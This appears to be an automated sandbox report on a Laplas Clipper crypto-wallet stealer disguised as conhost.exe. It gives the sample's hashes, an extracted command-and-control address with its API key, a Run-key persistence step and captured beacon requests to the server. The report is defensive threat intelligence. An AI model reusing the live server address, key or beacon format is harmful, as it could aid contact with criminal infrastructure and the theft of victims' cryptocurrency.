Analysis

  • max time kernel
    135s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    17-05-2023 15:29

General

  • Target

    conhost.exe

  • Size

    4.0MB

  • MD5

    feccda803ece2e7a3b7e9798714ad47e

  • SHA1

    e97182adccf8a7692e6ad2614b0fb7fd3898a1a2

  • SHA256

    14529dca41abfea65abb51c84ec34ba0a951581586f98cef60213ae949a78320

  • SHA512

    dec5fd4d184772ca590333b2382706c6e5a7b5050f9ae98af813192e06500424870e8332a1406c763e5cc6d266ddd7e09280b6bf118392fa6edea6fab5843287

  • SSDEEP

    49152:jEjwvlIKv05z+UERnIcYmWjc3Cdh+5E9UFiqeb0/B1:RlhWzZ6hjEciqe

Malware Config

Extracted

Family

laplas

C2

http://185.223.93.251

Attributes
  • api_key

    f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Executes dropped EXE (1 IoC)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • GoLang User-Agent (1 IoC)

    Uses the default User-Agent string set by the Go HTTP packages (Go-http-client/1.1).

  • Suspicious use of WriteProcessMemory (2 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\conhost.exe
    "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      • Executes dropped EXE
      PID:536

Network

  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-nl
    GET
    http://185.223.93.251/bot/regex
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:29:52 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:29:52 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/regex
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:30:52 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:30:52 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/regex
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:31:53 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin
    ntlhost.exe
    Remote address:
    185.223.93.251:80
    Request
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 17 May 2023 15:31:53 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    251.93.223.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    251.93.223.185.in-addr.arpa
    IN PTR
    Response
    251.93.223.185.in-addr.arpa
    IN PTR
    customerclientshostnamecom
  • flag-us
    DNS
    86.8.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.8.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • 93.184.221.240:80
    260 B
    5
  • 93.184.221.240:80
    322 B
    7
  • 185.223.93.251:80
    http
    ntlhost.exe
    1.6kB
    3.7kB
    15
    17

    HTTP Requests (each answered with HTTP Response 200):

    GET http://185.223.93.251/bot/regex
    GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=TLGENAJY\Admin

    This pair of requests was issued three times during the session (at 15:29:52, 15:30:52 and 15:31:53 GMT), i.e. roughly once per minute.
  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    76.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    76.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    251.93.223.185.in-addr.arpa
    dns
    73 B
    115 B
    1
    1

    DNS Request

    251.93.223.185.in-addr.arpa

  • 8.8.8.8:53
    86.8.109.52.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    86.8.109.52.in-addr.arpa

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    384.8MB

    MD5

    59e30a386a548161ffb85ce155376f69

    SHA1

    953b85e50bfde88e1c3309a0cb49e86e1a78b13a

    SHA256

    2c4651ef6233e71269286dad60dd3fdae2d48d18080f8d65227c438a7f5d381f

    SHA512

    7278dd127883e1b7fa167a92b50becd4ab29e5098b03ea95740710302457a61c05ebf7347610ef12cca79fd3723602f7977aa8919de25f33f06212e6b4fce2fd

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    381.7MB

    MD5

    a43f106734e07aaf60929de2f6a7a308

    SHA1

    f7ece4e6e6cd7fc1f4a6432493789bbb5a6abb1e

    SHA256

    aa9c6c193aa0c6fd91492db278475f1400f876ccc8cbcefc18e0b3a522faeffd

    SHA512

    1109434606fda21698a28bd793a18bd2f4b8b42aa44f7ad54234b9043e4b8272584bb3cd53ef97a9a9f8d9159d797a4fae6babfb1bb1b6560210e57f95e1313f
